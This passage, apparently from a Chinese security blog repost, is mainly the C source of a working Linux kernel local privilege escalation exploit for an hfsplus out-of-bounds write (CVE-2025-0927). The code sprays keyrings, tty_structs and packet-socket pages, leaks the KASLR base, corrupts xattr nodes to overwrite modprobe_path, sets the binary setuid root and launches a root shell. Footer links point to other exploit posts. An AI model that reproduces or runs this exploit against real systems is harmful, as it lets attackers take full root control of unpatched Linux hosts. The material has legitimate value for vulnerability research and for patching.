    int leaf_nodes[] = {0, 2, 4, 6, 8, 10, 12, 14};
    int base_size = sizeof(base_nodes) / sizeof(base_nodes[0]);
    int leaf_size = sizeof(leaf_nodes) / sizeof(leaf_nodes[0]);

    for (int i = 100; i < 111; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", i, i);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%d", i);
        setxattr("/tmp/tmpfs/xattr_node_3", xattr_name, xattr_value, strlen(xattr_value), 0);
    }


    for (int i = 0; i < base_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", base_nodes[i], base_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", base_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node", xattr_name, xattr_value, strlen(xattr_value), 0);
    }

    for (int i = 0; i < leaf_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", leaf_nodes[i], leaf_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", leaf_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node", xattr_name, xattr_value, strlen(xattr_value), 0);
    }
}

void spray_xattr_two(void)
{
    char xattr_name[XATTR_NAME_MAX_SIZE];
    char xattr_value[XATTR_NAME_MAX_SIZE];

    int base_nodes[] = {7, 3, 11, 1, 5, 9, 13};
    int leaf_nodes[] = {0, 2, 4, 6, 8, 10, 12, 14};
    int base_size = sizeof(base_nodes) / sizeof(base_nodes[0]);
    int leaf_size = sizeof(leaf_nodes) / sizeof(leaf_nodes[0]);


    for (int i = 200; i < 211; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", i, i);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%d", i);
        setxattr("/tmp/tmpfs/xattr_node_3", xattr_name, xattr_value, strlen(xattr_value), 0);
    }

    for (int i = 0; i < base_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", base_nodes[i], base_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", base_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node_2", xattr_name, xattr_value, strlen(xattr_value), 0);
    }

    for (int i = 0; i < leaf_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", leaf_nodes[i], leaf_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", leaf_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node_2", xattr_name, xattr_value, strlen(xattr_value), 0);
    }
}

char *read_modprobe_content(void) 
{
    FILE *file;
    char buffer[BUFFER_SIZE];
    char *content;

    file = fopen(MODPROBE_PATH, "r");
    if (file == NULL) {
        perror("Failed to open /proc/sys/kernel/modprobe");
        return NULL;
    }
    if (fgets(buffer, sizeof(buffer), file) == NULL) {
        perror("Failed to read from /proc/sys/kernel/modprobe");
        fclose(file);
        return NULL;
    } 
    content = (char*)malloc(strlen(buffer) + 1);
    if (content == NULL) {
        perror("Failed to allocate memory");
        fclose(file);
        return NULL;
    }
    strcpy(content, buffer); 
    fclose(file); 

    size_t len = strlen(content);

    if (len > 0 && content[len - 1] == 'n') {
        content[len - 1] = '';
    }

    return content;
}

int check_modprobe(void)
{
    const char *fixed_string = "/sbin/modprobe";

    usleep(100000);

    char *modprobe_content = read_modprobe_content();
    if (modprobe_content != NULL) {
        printf("[+] modprobe: %sn", modprobe_content);
            return strcmp(modprobe_content, fixed_string);
        } 
    else {
        do_error_exit("check_modprobe couldn't read modprobe content");
    }
}

int check_modprobe_final(void)
{
    const char *fixed_string = "/tmp/bgp";

    usleep(100000);

    char *modprobe_content = read_modprobe_content();
    if (modprobe_content != NULL) {
        printf("[+] modprobe: %sn", modprobe_content);
            return !strncmp(modprobe_content, fixed_string, 8);
        } 
    else {
        do_error_exit("check_modprobe couldn't read modprobe content");
    }
}



void check_for_modprobe_overwrite_one(void){
    char xattr_name[XATTR_NAME_MAX_SIZE];
    char xattr_value[XATTR_NAME_MAX_SIZE];

    int redblack[] = {0, 2, 4, 6, 8, 10, 12, 14};

    int success = false;

    printf("[+] Checking for xattr corruptionsn");

    int array_size = sizeof(redblack) / sizeof(redblack[0]);
    for (int i = 0; i < array_size; i++) { 
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", redblack[i]);
        printf("[+] current xattr to delete: %sn", xattr_name);

        /* rbtree __rb_change_child should happen here */
        removexattr("/tmp/tmpfs/xattr_node", xattr_name);

        if (check_modprobe()) {
            printf("[+] Successfully corrupted modprobe path #1n"); 
            fflush(stdout);

            system("cat /proc/sys/kernel/modprobe"); 
            success = true;
            sleep(1);
            break;
        }
    }
    if (!success){
        sleep(1);
        do_error_exit("Couldn't overwrite first part of modprobe"); 
    }

}

void check_for_modprobe_overwrite_two(void){
    char xattr_name[XATTR_NAME_MAX_SIZE];
    char xattr_value[XATTR_NAME_MAX_SIZE];

    int redblack[] = {0, 2, 4, 6, 8, 10, 12, 14};

    int success = false;

    printf("[+] Checking for xattr corruptionsn");

    int array_size = sizeof(redblack) / sizeof(redblack[0]);
    for (int i = 0; i < array_size; i++) { 
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", redblack[i]);
        printf("[+] current xattr to delete: %sn", xattr_name);

        /* rbtree __rb_change_child should happen here */
        removexattr("/tmp/tmpfs/xattr_node_2", xattr_name);

        if (check_modprobe_final()) {
            printf("[+] Successfully corrupted modprobe path #2n"); 
            fflush(stdout);

            system("cat /proc/sys/kernel/modprobe"); 
            success = true;
            sleep(5);
            break;
        }
    }
    if (!success){
        sleep(1);
        do_error_exit("Couldn't overwrite modprobe"); 
    }

}

void trigger_oob(void)
{
    key_serial_t *id_buffer;

    id_buffer = spray_keyring(SPRAY_KEY_SIZE, SPRAY_KEY_SIZE_INIT);

    spray_tty_struct(SPRAY_TTY_SIZE);

    char *attr_value = "dummy";
    int result = setxattr("/tmp/mnt0/hacked_node", "user.1", attr_value, strlen(attr_value), 0);

    if (result != 0)
        do_error_exit("setxattr attempt on vuln fs");

    kaslr_base_recovered = get_keyring_leak(id_buffer, (uint32_t)SPRAY_KEY_SIZE);
    sleep(1);

    release_keys(id_buffer, SPRAY_KEY_SIZE);
}

void trigger_oob_xattr(void)
{
    char *attr_value = "dummy";
    int result = setxattr("/tmp/mnt1/hacked_node", "user.1", attr_value, strlen(attr_value), 0);

    if (result != 0)
        do_error_exit("setxattr attempt on vuln fs"); 
}

void trigger_oob_xattr_two(void)
{
    char *attr_value = "dummy";
    int result = setxattr("/tmp/mnt2/hacked_node", "user.1", attr_value, strlen(attr_value), 0);

    if (result != 0)
        do_error_exit("setxattr attempt on vuln fs"); 
}


/* Function to monitor /proc/contig_alloc_info */
void *monitor_function(void *arg)
{
    int consecutive_ones = 0;

    const int required_consecutive = 10;
    /* 0.1 seconds in microseconds */
    const useconds_t interval = 100000;

    while (1) {
        char buffer[128];
        FILE *file;

        /* Open the file for reading */
        file = fopen("/proc/contig_alloc_info", "r");
        if (file == NULL) {
            perror("Failed to open /proc/contig_alloc_info");
            pthread_exit(NULL);
        }

        /* Read a line from the file */
        if (fgets(buffer, sizeof(buffer), file) != NULL) {
            int value;
            char timestamp[64];

            /* Parse the timestamp and value */
            if (sscanf(buffer, "%s %d", timestamp, &value) == 2) {
                if (value == 1) {
                    consecutive_ones++;
                    if (consecutive_ones == required_consecutive) {
                        printf("Value is 1 for %d consecutive checks at %sn", required_consecutive, timestamp);
                        printf("UNIX timestamp at side-channel trigger: %lldn", get_precise_time());
                        // trigger_oob();
                    }
                } else {
                    /* Reset the counter if value is not 1 */
                    consecutive_ones = 0;
                }
            } else {
                fprintf(stderr, "Failed to parse the line: %s", buffer);
            }
        } else {
            fprintf(stderr, "Failed to read from /proc/contig_alloc_infon");
        }

        fclose(file);

        usleep(interval);
    }
    return NULL;
}

void print_contiginfo(void)
{
    char buffer[128];
    FILE *pipe;

    pipe = popen("cat /proc/contig_alloc_info", "r");
    if (pipe == NULL) {
        do_error_exit("popen failed");
    return;
    }

    while (fgets(buffer, sizeof(buffer), pipe) != NULL)
        printf("%s", buffer);

    pclose(pipe);
}

void print_buddyinfo(void)
{
    char buffer[128];
    FILE *pipe;

    pipe = popen("cat /proc/buddyinfo", "r");
    if (pipe == NULL)
        do_error_exit("popen failed");

    while (fgets(buffer, sizeof(buffer), pipe) != NULL)
        printf("%s", buffer);

    pclose(pipe);
}

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
    struct tpacket_req req;
    int socket_fd, version;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        printf("[-] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)n");
        ret = socket_fd;
        goto err_out;
    }

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
                     &version, sizeof(version));
    if (ret < 0) {
        printf("[-] failed at setsockopt(PACKET_VERSION)n");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        printf("[-] failed at setsockopt(PACKET_TX_RING)n");
        goto err_setsockopt;
    }

    return socket_fd;

err_setsockopt:
    close(socket_fd);
err_out:
    return ret;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int exit_child(void) {
    struct pgv_page_request req = { 
        .cmd = CMD_EXIT
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret; 
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_FREE_PAGE,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(req));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    usleep(10000);

    return ret;
}

void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* Create an isolated namespace*/
    unshare_setup();

    /* Handle requests */
    do {
        read(cmd_pipe_req[0], &req, sizeof(req));

        if (req.cmd == CMD_ALLOC_PAGE) {
            ret = create_socket_and_alloc_pages(req.size, req.nr);
            socket_fd[req.idx] = ret;
        } else if (req.cmd == CMD_FREE_PAGE) {
            ret = close(socket_fd[req.idx]);
        } else if (req.cmd == CMD_EXIT) {
            ret = 0;
            write(cmd_pipe_reply[1], &ret, sizeof(ret));
            printf("[+] Exitingn");
            break; 
        } else { 
            printf("[-] invalid request: %dn", req.cmd);
        }

        write(cmd_pipe_reply[1], &ret, sizeof(ret));
    } while (req.cmd != CMD_EXIT);

    printf("[+] Finished command handlern");
    _exit(0);
}

pid_t prepare_pgv_system(void)
{
    pid_t pid;
    /* Pipe for pgv */
    pipe(cmd_pipe_req);
    pipe(cmd_pipe_reply);

    /* Child process for pages spray */
    pid = fork();
    if (!pid)
        spray_cmd_handler();
    else {
        printf("[+] Kicked off spray process %dn", pid);
        return pid;
    }
}

/* Spray pages in different size for various usages and trigger first OOB */
void prepare_pgv_pages_cross_oob(void)
{
#ifdef DEBUG_CROSSCACHE
    print_contiginfo();
    print_buddyinfo();
#endif 
    /*
     * We want a more clear and continuous memory there, which require us to
     * make the noise less in allocating order-3 pages.
     * So we pre-allocate the pages for those noisy objects there.
     */
    puts("[*] spray pgv order-0 pages...");
    for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
        if (alloc_page(i, 0x1000, 1) < 0)
            printf("[-] failed to create %d socket for pages spraying!n", i);
    }
#ifdef DEBUG_CROSSCACHE
    print_contiginfo();
    print_buddyinfo();
#endif 


    puts("[*] spray pgv order-1 pages...");
    for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
        if (alloc_page(i, 0x1000 * 2, 1) < 0)
            printf("[-] failed to create %d socket for pages spraying!n", i);
    }

#ifdef DEBUG_CROSSCACHE
    print_contiginfo();
    print_buddyinfo();
#endif
    puts("[*] spray pgv order-2 pages...");
    for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
        if (i == 2) {
            /* This looks arbitrary AF, but I made a bunch of measurements and undergrad level stats that support it */
            usleep(166000);

            printf("[+] UNIX timestamp at page-2 splitting: %lldn", get_precise_time());
            trigger_oob();
        }

        if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0)
            printf("[-] failed to create %d socket for pages spraying!n", i);
    }

#ifdef DEBUG_CROSSCACHE
    print_contiginfo();
    print_buddyinfo();
#endif

    /* Spray 8 pages for page-level heap fengshui */
    puts("[*] spray pgv order-3 pages...");
    for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
        /* A socket need 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 page*/
        if (i % 19 == 0)
            free_page(pgv_4pages_start_idx++);

        /* A socket need 1 dentry: dentry, 21 objs for 1 slub on 1 page */
        if (i % 21 == 0)
            free_page(pgv_1page_start_idx += 2);

        /* A pgv need 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page*/
        if (i % 512 == 0)
            free_page(pgv_1page_start_idx += 2);

        if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0)
            printf("[-] failed to create %d socket for pages spraying!n", i);
    }
#ifdef DEBUG_CROSSCACHE 
    print_contiginfo();
    print_buddyinfo();
#endif 
}

uint64_t parse_leak(uint8_t *buffer, uint32_t buffer_size)
{
    int success;
    uint64_t kaslr_base_found;
/*
    for (uint32_t i = 0; i < buffer_size; i++)
        printf("%02x", buffer[i]);
    printf("n");
*/    
    success = 0;

    /* Process the buffer to find pointer triples and calculate KASLR base */
    find_pointer_triples(buffer, buffer_size, &success, &kaslr_base_found);
    if (!success)
        do_error_exit("Could not recover KASLR basen");

    return kaslr_base_found;
}

void spray_tty_struct(int max)
{
    int spray[100];

    printf("[+] Spraying tty_structsn");

    for (int i = 0; i < max; i++) {
        spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
    }
}


key_serial_t *spray_keyring(uint32_t spray_size, uint32_t offset)
{
    char key_desc[KEY_DESC_MAX_SIZE];
    key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t));

    if (id_buffer == NULL)
        do_error_exit("calloc");

    printf("[+] Spraying keys...");
    for (uint32_t i = 0; i < spray_size; i++) { 
        snprintf(key_desc, KEY_DESC_MAX_SIZE, "attilaszia-%d%498d", offset + i, offset + i);

        id_buffer[i] = add_key("user", key_desc, key_desc, strlen(key_desc), KEY_SPEC_PROCESS_KEYRING);
        if (id_buffer[i] < 0)
            do_error_exit("add_key");
    }
    printf("donen");

    return id_buffer;
}

uint64_t get_keyring_leak(key_serial_t *id_buffer, uint32_t id_buffer_size)
{
    uint8_t buffer[USHRT_MAX] = {0};
    int32_t keylen;

    printf("[+] Checking sprayed keys for corruptionn");
    for (uint32_t i = 0; i < id_buffer_size; i++) {

        keylen = keyctl(KEYCTL_READ, id_buffer[i], (long)buffer, USHRT_MAX, 0);

        if (keylen < 0)
            continue;

        if (keylen > 1024) {
            printf("[+] Found corrupted key, triggering infoleakn");
            return parse_leak(buffer, keylen);
        }
    }
    return 0;
}

void release_keys(key_serial_t *id_buffer, uint32_t id_buffer_size)
{
    printf("[+] Releasing %d keysn", id_buffer_size);

    for (uint32_t i = 0; i < id_buffer_size; i++) {
        if (keyctl(KEYCTL_REVOKE, id_buffer[i], 0, 0, 0) < 0)
            perror("keyctl(KEYCTL_REVOKE)");
        if (keyctl(KEYCTL_UNLINK, id_buffer[i], KEY_SPEC_PROCESS_KEYRING, 0, 0) < 0)
            perror("keyctl(KEYCTL_UNLINK)");
    }

    free(id_buffer);
}


int qemu_mount_oracle(char *file_path, char *loop_device_path, char *mount_point)
{
    char command[1024];
    snprintf(command, sizeof(command), "/qemu_oracle mount %s %s %s", file_path, loop_device_path, mount_point);
    system(command);

    return 0;
}

int qemu_umount_oracle(char *file_path, char *loop_device_path, char *mount_point)
{
    char command[1024];
    snprintf(command, sizeof(command), "/qemu_oracle unmount %s %s %s", file_path, loop_device_path, mount_point);
    system(command);

    return 0;
}

void set_myself_suid(char *my_path)
{
    char *script = malloc(0x200);
    char *modprobe_path = read_modprobe_content();

    sprintf(script, "#!/bin/bashnchown root:root %snchmod u+s %sn", my_path, my_path); 
    write_file(modprobe_path, script, strlen(script));

    sprintf(script, "chmod 700 %sn", modprobe_path);
    system(script);

    write_file("/tmp/z", "xffxffxffxffxffxff", 6);
    system("chmod 700 /tmp/z");

    // Trigger modprobe_path
    system("/tmp/z 2>/dev/null");
    printf("[+] setuid bit setn");
}

int main(char *argc, char **argv)
{
    key_serial_t *id_buffer;
    char *xattr_target_filename;
    struct write4_payload payload;
    pthread_t monitor_thread;
    pid_t pid;
    int status; 

/* Root shell part */    
    uid_t euid = geteuid(); 

    if (euid == 0)
    {
        // Got root!
        printf("[+] Popping root shell, courtesy of @4ttil4sz1an");

        setuid(0);
        setgid(0);
        char *args[] = {"/bin/sh", NULL};
        execve("/bin/sh", args, NULL);

        return 0;
    } 

        char *dir_path = malloc(0x200);
    getcwd(dir_path, 0x200);
    char *path = malloc(PATH_MAX);
    readlink("/proc/self/exe", path, PATH_MAX - 1);
    printf("[+] Running at %sn", path);


    sem_t *sem_pop_shell = make_semaphore(0);

    if(!fork()){
            sem_wait(sem_pop_shell);
            char *args[] = {path, NULL};
            execve(path, args, NULL);
        }

/* Initialization */    

    set_cpu_affinity(0, 0);

    printf("[+] Running as UID=%d, GID=%dn", getuid(), getgid());

    prepare_mounts();

/* KASLR leak part */    

    prepare_filesystem(hack_hfs_keyring, "/tmp/malformed_ring.raw", 0);

    qemu_mount_oracle("/tmp/malformed_ring.raw", "/dev/loop1", "/tmp/mnt0/");


#ifdef DEBUG_CROSSCACHE
    if (pthread_create(&monitor_thread, NULL, monitor_function, NULL) != 0)
        do_error_exit("Failed to create the monitor thread");
#endif


    id_buffer = spray_keyring(SPRAY_KEY_SIZE_INIT, 0);

    spray_tty_struct(SPRAY_TTY_INITIAL);

    pid = prepare_pgv_system();

    prepare_pgv_pages_cross_oob();

    release_keys(id_buffer, SPRAY_KEY_SIZE_INIT);

    exit_child();

    waitpid(pid, &status, 0);

    printf("[+] Waitpid status %dn", status);

/* LPE part */

    prepare_filesystem(hack_hfs_modprobe_one, "/tmp/malformed_mod_1.raw", kaslr_base_recovered);

    qemu_mount_oracle("/tmp/malformed_mod_1.raw", "/dev/loop2", "/tmp/mnt1/");

    prepare_filesystem(hack_hfs_modprobe_two, "/tmp/malformed_mod_2.raw", kaslr_base_recovered);

    qemu_mount_oracle("/tmp/malformed_mod_2.raw", "/dev/loop3", "/tmp/mnt2/");

    unshare_setup_xattr(getuid(), getgid());

    printf("UID: %d, GID: %dn", getuid(), getgid());

    prepare_tmpfs();

    spray_xattr(); 

     trigger_oob_xattr();

    check_for_modprobe_overwrite_one(); 

    spray_xattr_two();

    trigger_oob_xattr_two();

    check_for_modprobe_overwrite_two(); 

    set_myself_suid(path);

    printf("[+] Escalating privilegesn");

    sem_post(sem_pop_shell);
    wait(NULL);
    sleep(0x100000); 
}

感谢您抽出

来阅读本文

点它，分享点赞在看都在这里

原文始发于微信公众号（Ots安全）：CVE-2025-0927：Linux 内核 hfsplus slab 越界写入分析（EXP）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2025-0927：Linux 内核 hfsplus slab 越界写入分析（EXP）

Redis hyperloglog模块存在可远程利用的代码执行漏洞（CVE-2025-32023）

汉王EFaceGo upload.do 任意文件上传漏洞 POC

信呼OA uploawAction.php SQL注入漏洞

Redis hyperloglog 远程代码执行漏洞(CVE-2025-32023)

【成功复现】Pichome路径遍历漏洞 (CVE-2025-1743) POC

【已复现】Windows Update Service 本地权限提升漏洞(CVE-2025-48799)

【已复现】Git 远程代码执行漏洞(CVE-2025-48384)

Redis hyperloglog 远程代码执行漏洞(CVE-2025-32023)

严重Sudo漏洞使主流Linux发行版面临本地提权攻击风险

Prometheus 未授权访问漏洞处理

发表评论

在线咨询

微信